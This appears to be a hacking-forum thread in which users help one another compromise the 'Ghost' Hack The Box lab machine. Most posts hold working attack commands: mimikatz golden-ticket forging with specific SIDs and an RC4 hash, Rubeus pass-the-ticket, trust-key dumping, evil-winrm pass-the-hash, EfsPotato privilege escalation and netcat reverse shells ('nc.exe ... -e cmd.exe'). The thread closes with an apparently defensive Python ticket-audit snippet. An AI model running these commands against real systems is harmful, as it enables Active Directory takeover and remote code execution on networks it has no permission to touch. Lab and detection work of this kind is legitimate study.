Ghost - Insane
by f4k3h4ck3r - Saturday July 13, 2024 at 03:43 PM
(Jul 15, 2024, 12:15 PM)mazafaka555 Wrote:
(Jul 15, 2024, 11:35 AM)jsvensson Wrote:
(Jul 15, 2024, 11:19 AM)bmoon10 Wrote:
(Jul 15, 2024, 11:02 AM)spamdegratis5 Wrote:
(Jul 15, 2024, 10:58 AM)bmoon10 Wrote: with mimikatz golden ticket can be obtained using ghost$ rc4 hash and corp.ghost.htb and ghost.htb sids.

Yeah, I know, but every ticket returns the error (both nthash and aeskey):
[-] Kerberos SessionError: KDC_ERR_TGT_REVOKED(TGT has been revoked)

Looking for a possible cause, maybe this is related? https://github.com/fortra/impacket/issues/1601 
Quote:When using NTLM hash of KRBTGT and Impacket's ticketer, you will need the "-user-id" flag.
Example:
impacket-ticketer -nthash $HASH -domain-sid $DOMAIN_SID -domain $DOMAIN -user-id $IDofUSER $NameOfUser
To get the user-id, you just need to use Mimikatz or others like WMIC ("wmic useraccount where name='joe' get sid")

Quote:That is because Windows from the update KB5008380 got a new PAC structure and a new check: KDC now checks if the user actually exists with the right RID. So now you need to make a ticket for an existing user with right RID with the flag -user-id as earlesshoichi mentioned before.

I'll try with an existing user

Not sure where you are getting the ghost$ RC4 hash from; I've used the ghost$ RC4 hash from the meterpreter hashdump command to get the golden ticket (with mimikatz for the TGT and Rubeus.exe for the TGS, and it worked).

Yep, it worked, I could read user.txt and root.txt. But how do I get a shell on dc01? I tried psexec but it fails.


One of the usual possibilities with Cobalt Strike: once you have full access to the DC, you may upload your payload via SMB and spawn it remotely to get access to the DC.

https://www.youtube.com/watch?v=dDAz13wmCk8
https://www.youtube.com/watch?v=GI-vvX_OBd4
https://www.youtube.com/watch?v=QuU_u-yu8Lc

Don't have Cobalt Strike but finally got a stable shell.
Using psexec I downloaded nc.exe to the DC.
After that, with psexec, I ran nc to get a shell, but it gets killed after a while, so from that shell I ran nc.exe again and got another shell, and that one does not get killed :D
Reply
(Jul 15, 2024, 12:09 PM)bmoon10 Wrote:
(Jul 15, 2024, 12:02 PM)myhem Wrote:
(Jul 15, 2024, 11:49 AM)osamy7593 Wrote: In 10.0.0.10


kerberos::golden /user:Administrator /domain:CORP.GHOST.HTB /sid:S-1-5-21-2034262909-2733679486-179904498 /sids:S-1-5-21-4084500788-938703357-3654145966-519 /rc4:dae1ad83e2af14a379017f244a2f5297 /service:krbtgt /target:GHOST.HTB /ticket:golden.kirbi

.\rubeus.exe asktgs /ticket:golden.kirbi /service:cifs/DC01.ghost.htb /dc:DC01.ghost.htb /ptt /nowrap

dir \\DC01.ghost.htb\C$

I'm still getting the error; could you please tell me which commands you used?

dir \\DC01.ghost.htb\C$ returns access denied if there are issues in the tickets.
If both the TGT and the TGS work properly, you won't face issues with the dir command.

I'm also getting the access denied error. Below are my commands; I don't think there is anything mistyped. Please help.

.\mimikatz "kerberos::golden /user:Administrator /domain:CORP.GHOST.HTB /sid:S-1-5-21-2034262909-2733679486-179904498 /sids:S-1-5-21-4084500788-938703357-3654145966-519 /rc4:dae1ad83e2af14a379017f244a2f5297 /service:krbtgt /target:GHOST.HTB /ticket:golden.kirbi" exit
.\Rubeus.exe asktgs /ticket:golden.kirbi /dc:dc01.ghost.htb /service:CIFS/dc01.ghost.htb /nowrap /ptt
.\Rubeus.exe ptt /ticket:golden.kirbi
dir \\dc01.ghost.htb\c$


nvm, need to do this first
.\mimikatz "lsadump::trust /patch" exit
Reply
(Jul 15, 2024, 12:01 AM)osamy7593 Wrote:
(Jul 14, 2024, 10:22 PM)imassxck Wrote:
(Jul 14, 2024, 10:04 PM)osamy7593 Wrote: What comes after proxychains4 evil-winrm -i 10.0.0.10 -u 'Administrator' -H '41515af3ada195029708a53d941ab751'?

(Jul 14, 2024, 10:02 PM)imassxck Wrote: I tried using PrintSpoofer because the mssqlserver has SeImpersonatePrivilege, but I couldn't upload PrintSpoofer.

Use EfsPotato to get SYSTEM.

https://github.com/zcgonvh/EfsPotato --> move EfsPotato.cs to the target machine

C:\Windows\Microsoft.Net\Framework\v4.0.30319\csc.exe EfsPotato.cs -nowarn:1691,618

./EfsPotato.exe 'whoami'

Thank you. But when I run 
./EfsPotato.exe 'cmd'
it crashes.


Use nc.exe -nv ip port -e cmd.exe

Whenever I try to run nc.exe it says `The system cannot execute the specified program.`
Reply
(Jul 15, 2024, 12:34 PM)r9967252 Wrote:
[nested quotes identical to bmoon10's post above]

[*]
[*]Action: Ask TGS
.
.
[*]Using domain controller: dc01.ghost.htb (10.10.11.24)
[X] KRB-ERROR (31) : KRB_AP_ERR_BAD_INTEGRITY


I'm getting this error.

Reply
(Jul 15, 2024, 12:34 PM)r9967252 Wrote:
[nested quotes identical to bmoon10's post above]

Were you able to access C$?
I'm getting access denied, even after I reset the box and tried again.
Reply
(Jul 15, 2024, 12:34 PM)r9967252 Wrote:
[nested quotes identical to bmoon10's post above]

[*]Action: Ask TGS
[*]Using domain controller: dc01.ghost.htb (10.0.0.254)
[*]Requesting default etypes (RC4_HMAC, AES[128/256]_CTS_HMAC_SHA1) for the service ticket
[*]Building TGS-REQ request for: 'CIFS/dc01.ghost.htb'
[X] KRB-ERROR (68) : KDC_ERR_WRONG_REALM


I believe the domain SID in mimikatz is wrong; how can I enumerate that?
Reply
(Jul 15, 2024, 01:25 PM)eunaosei Wrote:
[nested quotes identical to the posts above]

[*]Action: Ask TGS
[*]Using domain controller: dc01.ghost.htb (10.0.0.254)
[*]Requesting default etypes (RC4_HMAC, AES[128/256]_CTS_HMAC_SHA1) for the service ticket
[*]Building TGS-REQ request for: 'CIFS/dc01.ghost.htb'
[X] KRB-ERROR (68) : KDC_ERR_WRONG_REALM


I believe the domain SID in mimikatz is wrong; how can I enumerate that?

Domain SID is good. User SID is wrong.
You can get some info like this:
wmic useraccount get name,sid
Reply
This is my ticket, but I can't access C$ on the DC; I'm getting Access denied.

Current LogonId is 0:0x320f62

Cached Tickets: (1)

#0> Client: Administrator @ CORP.GHOST.HTB
Server: cifs/DC01.ghost.htb @ GHOST.HTB
KerbTicket Encryption Type: AES-256-CTS-HMAC-SHA1-96
Ticket Flags 0x40a50000 -> forwardable renewable pre_authent ok_as_delegate name_canonicalize
Start Time: 7/15/2024 8:27:42 (local)
End Time: 7/15/2024 18:27:42 (local)
Renew Time: 7/22/2024 8:27:42 (local)
Session Key Type: AES-256-CTS-HMAC-SHA1-96
Cache Flags: 0
Kdc Called:
Reply
Hmm, why is it getting hard right now :(

Reply
(Jul 15, 2024, 02:55 PM)metasan Wrote:
(Jul 15, 2024, 01:25 PM)eunaosei Wrote: [nested quotes identical to the posts above]

[*]Action: Ask TGS
[*]Using domain controller: dc01.ghost.htb (10.0.0.254)
[*]Requesting default etypes (RC4_HMAC, AES[128/256]_CTS_HMAC_SHA1) for the service ticket
[*]Building TGS-REQ request for: 'CIFS/dc01.ghost.htb'
[X] KRB-ERROR (68) : KDC_ERR_WRONG_REALM


I believe the domain SID in mimikatz is wrong; how can I enumerate that?

Domain SID is good. User SID is wrong.
You can get some info like this:
wmic useraccount get name,sid

metasan is right, the user SID is wrong. Use wmic useraccount get name,sid and use the SID for krbtgt to set the ticket properly. Once that's done correctly you can dir \\dc01.ghost.corp\c$ without issue. It took a bit of playing around (mine was \mimikatz.exe "kerberos::golden /user:Administrator /domain:CORP.GHOST.HTB /sid:S-1-5-21-2034262909-2733679486-179904498-502 /sids:S-1-5-21-4084500788-938703357-3654145966-519 /rc4:dae1ad83e2af14a379017f244a2f5297 /service:krbtgt /target:GHOST.HTB /ticket:golden.kirbi" exit) and then everything worked.
Reply
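The two things this thread keeps tripping over, the post-KB5008380 check that the PAC must name an existing account with the right RID (the KDC_ERR_TGT_REVOKED replies) and the parent-domain Enterprise Admins SID carried in SID history, can be written up as a defender-side audit over ticket records. This is an added example, not code from the thread or from mimikatz, Rubeus or impacket; the domain snapshot and the event records are constructed, and only the two domain SIDs are taken from the thread.

```python
import re

# Constructed directory snapshot: the two domain SIDs are the ones quoted in the thread,
# the account list is invented and minimal.
DOMAIN_SIDS = {
    "CORP.GHOST.HTB": "S-1-5-21-2034262909-2733679486-179904498",
    "GHOST.HTB": "S-1-5-21-4084500788-938703357-3654145966",
}
ACCOUNTS = {DOMAIN_SIDS["CORP.GHOST.HTB"]: {500: "Administrator", 502: "krbtgt"}}
PRIVILEGED_RIDS = {512: "Domain Admins", 518: "Schema Admins", 519: "Enterprise Admins"}
SID_RE = re.compile(r"^S-1-5-21-\d+-\d+-\d+(?:-\d+)?$")


def split_sid(sid):
    """Split a domain-scoped SID into (domain_sid, rid); rid is None for a bare domain SID."""
    if not SID_RE.match(sid):
        raise ValueError(f"not a domain-scoped SID: {sid}")
    parts = sid.split("-")
    return (sid, None) if len(parts) == 7 else ("-".join(parts[:-1]), int(parts[-1]))


def check_ticket(event):
    """Return findings for one constructed 4768/4769-style record.
    event keys: realm, account_name, account_sid, sid_history (list of SIDs)."""
    findings = []
    realm_sid = DOMAIN_SIDS.get(event["realm"])
    domain_sid, rid = split_sid(event["account_sid"])
    # 1. The account SID must belong to the realm that issued the ticket.
    if domain_sid != realm_sid:
        findings.append(f"account SID domain {domain_sid} does not match realm {event['realm']}")
    # 2. KB5008380-style check: the RID must map to a real account with that name.
    #    A PAC that fails this is what the thread's KDC_ERR_TGT_REVOKED reflects.
    expected = ACCOUNTS.get(domain_sid, {}).get(rid)
    if expected is None:
        findings.append(f"no account with RID {rid} in {domain_sid}")
    elif expected.lower() != event["account_name"].lower():
        findings.append(f"RID {rid} belongs to {expected}, not {event['account_name']}")
    # 3. Privileged group SIDs from another domain in SID history (ExtraSids) deserve review:
    #    intra-forest trusts do not filter them by default.
    for extra in event.get("sid_history", []):
        hist_domain, hist_rid = split_sid(extra)
        if hist_rid in PRIVILEGED_RIDS and hist_domain != domain_sid:
            findings.append(f"foreign {PRIVILEGED_RIDS[hist_rid]} SID in SID history: {extra}")
    return findings
```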

